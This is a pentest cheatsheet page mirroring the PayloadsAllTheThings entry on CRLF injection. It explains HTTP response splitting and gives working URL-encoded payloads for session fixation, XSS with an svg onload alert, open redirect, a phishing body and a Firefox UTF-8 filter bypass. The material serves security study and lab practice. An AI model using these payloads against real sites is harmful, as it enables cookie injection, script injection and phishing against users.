daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (5969B)


      1 ---
      2 title: "Carriage Return Line Feed"
      3 topic: "CRLF Injection"
      4 topicSlug: "crlf-injection"
      5 sourcePath: "CRLF Injection/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/CRLF%20Injection/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # Carriage Return Line Feed
     12 
     13 > CRLF Injection is a web security vulnerability that arises when an attacker injects unexpected Carriage Return (CR) (\r) and Line Feed (LF) (\n) characters into an application. These characters are used to signify the end of a line and the start of a new one in network protocols like HTTP, SMTP, and others. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
     14 
     15 ## Summary
     16 
     17 * [Methodology](#methodology)
     18     * [Session Fixation](#session-fixation)
     19     * [Cross Site Scripting](#cross-site-scripting)
     20     * [Open Redirect](#open-redirect)
     21 * [Filter Bypass](#filter-bypass)
     22 * [Labs](#labs)
     23 * [References](#references)
     24 
     25 ## Methodology
     26 
     27 HTTP Response Splitting is a security vulnerability where an attacker manipulates an HTTP response by injecting Carriage Return (CR) and Line Feed (LF) characters (collectively called CRLF) into a response header. These characters mark the end of a header and the start of a new line in HTTP responses.
     28 
     29 **CRLF Characters**:
     30 
     31 * `CR` (`\r`, ASCII 13): Moves the cursor to the beginning of the line.
     32 * `LF` (`\n`, ASCII 10): Moves the cursor to the next line.
     33 
     34 By injecting a CRLF sequence, the attacker can break the response into two parts, effectively controlling the structure of the HTTP response. This can result in various security issues, such as:
     35 
     36 * Cross-Site Scripting (XSS): Injecting malicious scripts into the second response.
     37 * Cache Poisoning: Forcing incorrect content to be stored in caches.
     38 * Header Manipulation: Altering headers to mislead users or systems
     39 
     40 ### Session Fixation
     41 
     42 A typical HTTP response header looks like this:
     43 
     44 ```http
     45 HTTP/1.1 200 OK
     46 Content-Type: text/html
     47 Set-Cookie: sessionid=abc123
     48 ```
     49 
     50 If user input `value\r\nSet-Cookie: admin=true` is embedded into the headers without sanitization:
     51 
     52 ```http
     53 HTTP/1.1 200 OK
     54 Content-Type: text/html
     55 Set-Cookie: sessionid=value
     56 Set-Cookie: admin=true
     57 ```
     58 
     59 Now the attacker has set their own cookie.
     60 
     61 ### Cross Site Scripting
     62 
     63 Beside the session fixation that requires a very insecure way of handling user session, the easiest way to exploit a CRLF injection is to write a new body for the page. It can be used to create a phishing page or to trigger an arbitrary Javascript code (XSS).
     64 
     65 **Requested page**:
     66 
     67 ```http
     68 http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
     69 ```
     70 
     71 **HTTP response**:
     72 
     73 ```http
     74 Set-Cookie:en
     75 Content-Length: 0
     76 
     77 HTTP/1.1 200 OK
     78 Content-Type: text/html
     79 Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
     80 Content-Length: 34
     81 
     82 <html>You have been Phished</html>
     83 ```
     84 
     85 In the case of an XSS, the CRLF injection allows to inject the `X-XSS-Protection` header with the value value "0", to disable it. And then we can add our HTML tag containing Javascript code .
     86 
     87 **Requested page**:
     88 
     89 ```powershell
     90 http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
     91 ```
     92 
     93 **HTTP Response**:
     94 
     95 ```http
     96 HTTP/1.1 200 OK
     97 Date: Tue, 20 Dec 2016 14:34:03 GMT
     98 Content-Type: text/html; charset=utf-8
     99 Content-Length: 22907
    100 Connection: close
    101 X-Frame-Options: SAMEORIGIN
    102 Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
    103 ETag: "842fe-597b-54415a5c97a80"
    104 Vary: Accept-Encoding
    105 X-UA-Compatible: IE=edge
    106 Server: NetDNA-cache/2.2
    107 Link: https://example.com/[INJECTION STARTS HERE]
    108 Content-Length:35
    109 X-XSS-Protection:0
    110 
    111 23
    112 <svg onload=alert(document.domain)>
    113 0
    114 ```
    115 
    116 ### Open Redirect
    117 
    118 Inject a `Location` header to force a redirect for the user.
    119 
    120 ```ps1
    121 %0d%0aLocation:%20http://myweb.com
    122 ```
    123 
    124 ## Filter Bypass
    125 
    126 [RFC 7230](https://datatracker.ietf.org/doc/html/rfc7230#section-3.2.4) states that most HTTP header field values use only a subset of the US-ASCII charset.
    127 
    128 > Newly defined header fields SHOULD limit their field values to US-ASCII octets.
    129 
    130 Firefox followed the spec by stripping off any out-of-range characters when setting cookies instead of encoding them.
    131 
    132 | UTF-8 Character | Hex         | Unicode  | Stripped   |
    133 | --------------- | ----------- | -------- | ---------- |
    134 | `嘊`            | `%E5%98%8A` | `\u560a` | `%0A` (\n) |
    135 | `嘍`            | `%E5%98%8D` | `\u560d` | `%0D` (\r) |
    136 | `嘾`            | `%E5%98%BE` | `\u563e` | `%3E` (>)  |
    137 | `嘼`            | `%E5%98%BC` | `\u563c` | `%3C` (<)  |
    138 
    139 The UTF-8 character `嘊` contains `0a` in the last part of its hex format, which would be converted as `\n` by Firefox.
    140 
    141 An example payload using UTF-8 characters would be:
    142 
    143 ```js
    144 嘊嘍content-type:text/html嘊嘍location:嘊嘍嘊嘍嘼svg/onload=alert(document.domain()嘾
    145 ```
    146 
    147 URL encoded version
    148 
    149 ```js
    150 %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28document.domain%28%29%E5%98%BE
    151 ```
    152 
    153 ## Labs
    154 
    155 * [PortSwigger - HTTP/2 request splitting via CRLF injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
    156 * [Root Me - CRLF](https://www.root-me.org/en/Challenges/Web-Server/CRLF)
    157 
    158 ## References
    159 
    160 * [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://web.archive.org/web/20200113055606/https://www.owasp.org/index.php/CRLF_Injection)
    161 * [CRLF injection on Twitter or why blacklists fail - XSS Jigsaw - April 21, 2015](https://web.archive.org/web/20150425024348/https://blog.innerht.ml/twitter-crlf-injection/)
    162 * [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - December 20, 2016](https://vulners.com/hackerone/H1:192749)